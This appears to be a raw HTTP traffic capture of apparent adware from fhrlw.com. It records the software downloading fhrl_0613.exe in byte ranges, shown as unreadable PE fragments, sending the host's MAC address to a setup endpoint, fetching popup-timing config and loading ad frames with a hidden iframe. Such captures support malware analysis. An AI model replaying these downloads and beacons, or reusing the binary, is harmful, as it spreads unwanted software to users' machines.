..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=0-204800

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 0-204800/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:48 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u...u...u.......w...u...........d.......|.......t...Richu...................PE..L.....UH.................b....... ..o5............@..........................P......m.%..................................................@............$.(............................................................................................text...x`.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata...`...............................rsrc....@.......B..................@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......D..H.P.u..u..u...T.@..X...SV.5..D..E.WP.u...X.@..e...E..E.P.u...\.@..}..e..9}...D.@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...e....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.RD.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....D...Si.. ..VW.T.....tO.q.3.;5..D.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..D.r._

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=1843200-2048000

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 1843200-2048000/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:01 GMT

MU/.`...u.<2r.../.h."........j....?.0...:\..xP."?../Y....fA.........z.*.R..Qq....;Yy(...w*..S.....T.......7..o..D.......9....2.H.o..,.9.mq.J.'.=`......v>../.o....l.U.2[m.....i.i5Q...$.vi........'.x..SZ..mp...N..G..].....$YAd..zR....I..P.2....w.r.e....?....:.W.".....n..'&5<..L.8.).....y....kOc...J.[..h..2..u=_a.-.....P...E5....5.J..5.Udb.)....[.e..$$D.....M...6..I&.%v:.R.Q......R...$...D..M.IE...w$....,.[.e..k..n<%!..N...r.v.t; ..F7.....}.IaT.XT..!`...<.....I7.Y..t. '..<.~m#....E..q.....rZ...{.*&..O.....A..s6j$..;..\.C?.)FZ.K.o.[.1.....7...eF..KQ..X......R..>4E....<a|5..60..th0.A..k...S-.y.-.m..cE....,....;A..K&&.s.e~u.D.X.-..t.....X.X.R..../.*v..V...c[..........f6...<.......l...]..q...>...,.1dB<...Bt.l..X..r`.=..m..R2..|)#ZP......f.%..;/]"<.y_.....y.C.!.@0-.........^..............l....^..<.p.6.7..n9.'......].....D...z'.....P.....P5b...1..Z.P.Oj.daL.....Dz.._.\-.|].D@...oi..).. L..!..4.)z.m.Z...ng.c%.%....lSh..........W._p*..T.N.......?...".=..6.......C..t.q..E.<...O......Z.D......h.YM.......M.R$.S.... .*..9v..Z#.....2:..C....a.3...V .@.@TO.R`;xS......6.r]F4..!..\.EC.@.5x.}...x..[..T...U.q.....Z0.._r.r......d......'y...A3Y....4.P=S...x...].....b.Q..I.H...Tw..^..k.S.=...Y........D...i.]...g...........b.......;!F*.0....A...ZT..-T&.''.2.[..,...T2..m..T*=..gK8.U.7.m.^?..............BZ......C...1~!.g.1....2r...L~..8..z..Gn$...(.\V}. ..../.,.*.......k:.=...xp.E.s[.y..}....".T..%.;./k.x=3<..io...:2Z..B......8hm.}..K..>.*..'...b..DJ..@....7......{n......b..`@...r}.....I$.@

<<

<<< skipped >>>

GET /app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif HTTP/1.1

Accept: */*

Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img04.sogoucdn.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sat, 14 Jun 2014 09:00:46 GMT

Content-Type: image/jpeg

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

ETag: 042441fc49b4b85c9d202cbbd0c95096

Expires: Sun, 13 Jul 2014 16:07:20 GMT

Cache-Control: max-age=2592000

Last-Modified: Fri, 13 Jun 2014 16:07:20 GMT

4a5b..GIF89a..<...........$..Z.......U..Pw.n...By...............*y.Nj.....l.n.....s..F........S..2......H.q..HZq....`.'...T.U.....&k....,M..9i.P.....H.......................... N,.....2........./........_.o..........................t.....b..............v.............~fs.5`...................w.....y........G~.fw....;v.......Q......e.............~..g..W...b..&...................F.....>U.9i.&q.(a.....j.....b.i.....G...b.............{......d..N..........X.......................".....-B]Bm.Y......6.g...............i.$P....=..5w.0m..e..f..l...J.e.'[."-q.........@P.....d.I................................<==.b.....b............................................................................................................................................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="adobe:docid:photoshop:3eef0028-c4b0-11e1-b872-a278566b4a1b" xmpMM:DocumentID="xmp.did:FFA472CCDC9F11E3B1B4F5979CC6E9EA" xmpMM:InstanceID="xmp.iid:FFA472CBDC9F11E3B1B4F5979CC

<<

<<< skipped >>>

GET /Update/version.txt?45919992 HTTP/1.1

User-Agent: Update

Host: update.fhrlw.com

HTTP/1.1 200 OK

Content-Length: 72

Content-Type: .txt

Last-Modified: Fri, 13 Jun 2014 08:50:22 GMT

Accept-Ranges: bytes

ETag: "feb72083e486cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:21 GMT

[UpCfg]..Version=1.2.001..Force=1..KillClient=0..MsgTip=0..NoSlience=0....

GET /app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg HTTP/1.1

Accept: */*

Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: imgstore04.cdn.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@

HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sat, 14 Jun 2014 09:00:47 GMT

Content-Type: image/jpeg

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

ETag: 81348f8f42f879e735d0529c30d31e6d

Expires: Mon, 14 Jul 2014 05:41:35 GMT

Cache-Control: max-age=2592000

Last-Modified: Sat, 14 Jun 2014 05:41:35 GMT

bfe2........Exif..II*.................Ducky.......d......hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="adobe:docid:photoshop:fa8c3bce-11f1-11e2-97b7-8b5447d4275b" xmpMM:DocumentID="xmp.did:CD3827A8B5F811E2A6E2F5F05F9AE178" xmpMM:InstanceID="xmp.iid:CD3827A7B5F811E2A6E2F5F05F9AE178" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6430CD75F6B5E21180C4DCB93A6E3ED6" stRef:documentID="adobe:docid:photoshop:fa8c3bce-11f1-11e2-97b7-8b5447d4275b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................<...................................................................................................!...1.A"..Qa.2#.q..B3$...4...b..%5U.&6FVf.(.Rr.Ccs..e..............................!1..A".Qa.q2#......B..c.'...Rb.3.r.C...$.%6...S4.7G..Ueu............?..U1........[@i...l..i

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=2252800-2457600

Host: dl2.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 174816

Content-Type: application/octet-stream

Content-Range: bytes 2252800-2427615/2427616

Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT

Accept-Ranges: bytes

ETag: "b50867ae386cf1:4b5"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:22 GMT

...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x

<<

<<< skipped >>>

GET /api/GetConfig.ashx HTTP/1.1

User-Agent: oemfhsli

Host: client.fhrlw.com

HTTP/1.1 200 OK

Date: Sat, 14 Jun 2014 09:00:49 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/plain; charset=utf-8

Content-Length: 330

{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"ae9b8922d6184874896f5561d8fe0643","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}HTTP/1.1 200 OK..Date: Sat, 14 Jun 2014 09:00:49 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 330..{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"ae9b8922d6184874896f5561d8fe0643","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}....

GET /api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 HTTP/1.1

User-Agent: oemfhsli

Host: client.fhrlw.com

HTTP/1.1 200 OK

Date: Sat, 14 Jun 2014 09:01:19 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/plain; charset=utf-8

Content-Length: 38

{"errno":"1","filter":"1","valid":"0"}HTTP/1.1 200 OK..Date: Sat, 14 Jun 2014 09:01:19 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 38..{"errno":"1","filter":"1","valid":"0"}..

GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1

Accept: */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: inte.sogou.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:43 GMT

Content-Type: text/plain

Content-Length: 142

Connection: keep-alive

Cache-Control: no-cache

Pragma: no-cache

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Expires: Mon, 26 Jul 1997 08:00:00 GMT

Last-Modified: Sat Jun 14 17:00:43 2014

X-XSS-Protection: 0

Set-Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"0".}});HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:43 GMT..Content-Type: text/plain..Content-Length: 142..Connection: keep-alive..Cache-Control: no-cache..Pragma: no-cache..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Expires: Mon, 26 Jul 1997 08:00:00 GMT..Last-Modified: Sat Jun 14 17:00:43 2014..X-XSS-Protection: 0..Set-Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1..P3P: CP=" OTI DSP COR IVA OUR IND COM "..SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"0".}});....

GET /ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: inte.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:44 GMT

Content-Type: text/html

Content-Length: 7405

Connection: keep-alive

Cache-Control: no-cache

Pragma: no-cache

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Set-Cookie: SUID=E7F48AC12141900A539C0F3B000F06DC; path=/; expires=Mon, 13 Jun 2016 09:00:43 GMT; domain=sogou.com

Set-Cookie: ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:43 GMT; domain=.sogou.com

Expires: Mon, 26 Jul 1997 08:00:00 GMT

Last-Modified: Sat Jun 14 17:00:44 2014

X-XSS-Protection: 0

<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||

<<

<<< skipped >>>

GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1

Accept: */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: inte.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:45 GMT

Content-Type: text/plain

Content-Length: 160

Connection: keep-alive

Cache-Control: no-cache

Pragma: no-cache

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Expires: Mon, 26 Jul 1997 08:00:00 GMT

Last-Modified: Sat Jun 14 17:00:45 2014

X-XSS-Protection: 0

SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:45 GMT..Content-Type: text/plain..Content-Length: 160..Connection: keep-alive..Cache-Control: no-cache..Pragma: no-cache..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Expires: Mon, 26 Jul 1997 08:00:00 GMT..Last-Modified: Sat Jun 14 17:00:45 2014..X-XSS-Protection: 0..SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});....

GET /ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: inte.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Jun 2014 09:00:47 GMT

Content-Type: text/html

Content-Length: 7404

Connection: keep-alive

Cache-Control: no-cache

Pragma: no-cache

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Set-Cookie: ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:47 GMT; domain=.sogou.com

Expires: Mon, 26 Jul 1997 08:00:00 GMT

Last-Modified: Sat Jun 14 17:00:47 2014

X-XSS-Protection: 0

<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=1638400-1843200

Host: dl2.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 1638400-1843200/2427616

Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT

Accept-Ranges: bytes

ETag: "b50867ae386cf1:4b5"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:16 GMT

>...^(>.>.K..b.l.<....DzX....ejx...E.2.f.........|.....:..KSOMO..m.....#....#bqE.......^..ZT~.F.a.n.Q...%.Q..K.v..J<.....b.L.U........k..*E..&....0....=s....<. OfJ..g]..J.H.\5...Y{Y[......W.1..x0..a&...s#.[......0i...VC../9....1.w..*g..c.X.G=....... Y.D0..;...CV..'v....t.r\Y.E.........JR.[g...?J/..o..pT#v...3.m.*._.b...s.I=k.'vD./.w1q.'.<...W..`.n.,....$......d..|TQ.....9...) .]..mS.Sb._oN9...*,.3O..G%..K l.D...z?o..Io%|.....6....<mrS.A..wf>../...1.....C.1:V)z0..C....WO_..2=...F..*....H.$g....b...:.E.cq..d..(s<.....)|J..(............~..$........0....D......#3.?*4..;DJ....<..".......T.1G......s....R..b......c....;.J....S.......a....F.gn..8..;&. 1..v4:..}X..N7....&.f.?..9^..n..c ....7.:....IE.....vA....N..d\..#...n.......B.;...K.<..3YR.%Z..*. ....&..0.....q...{BK.h..$_.O..../...>qOF..=..t...Q4.`V._.8.!Jd\."e.....k..A.x.).R5..<....*.L!......p8A.ba%...H....kb...........{............?~-..&$..=J......S...r............j..W'\.........]..o0..........|..b)......P.k._..^....'yz.y......q......_......f..D...u.5.R.......FS.G-C....n.1..1j.VKp~.SKd.8.....(9......G..).8_.....o.BUPA....n\L.w../.....g.....jj..Nd/.wv...eq.W.@...........>..yr.Y.&wD....GR.#4c.V..'..7..De...%.3.{<..W..).&|:B.;{.W..........IA...d..a..Q...I...n..n .f.......Y.yp...9.z......<C.$.......I,R.o.b.>.7.m..Ed.-...6.....*1j(y?....I._ck5..J&......"oi..."7!.$8.4.@...q..,.g.K...J.M.<.azH4").V.....>..*zW...!I.'.-!.x.K.h..^..........B..l..[_y.).......[.Z..OB...\.W..>N...R.w;....oP... fHJ..7.E...u.........

<<

<<< skipped >>>

GET /api/GetConfig.ashx HTTP/1.1

User-Agent: FhCalendar

Host: client.fhrlw.com

HTTP/1.1 200 OK

Date: Sat, 14 Jun 2014 09:01:22 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Cache-Control: private

Content-Type: text/plain; charset=utf-8

Content-Length: 330

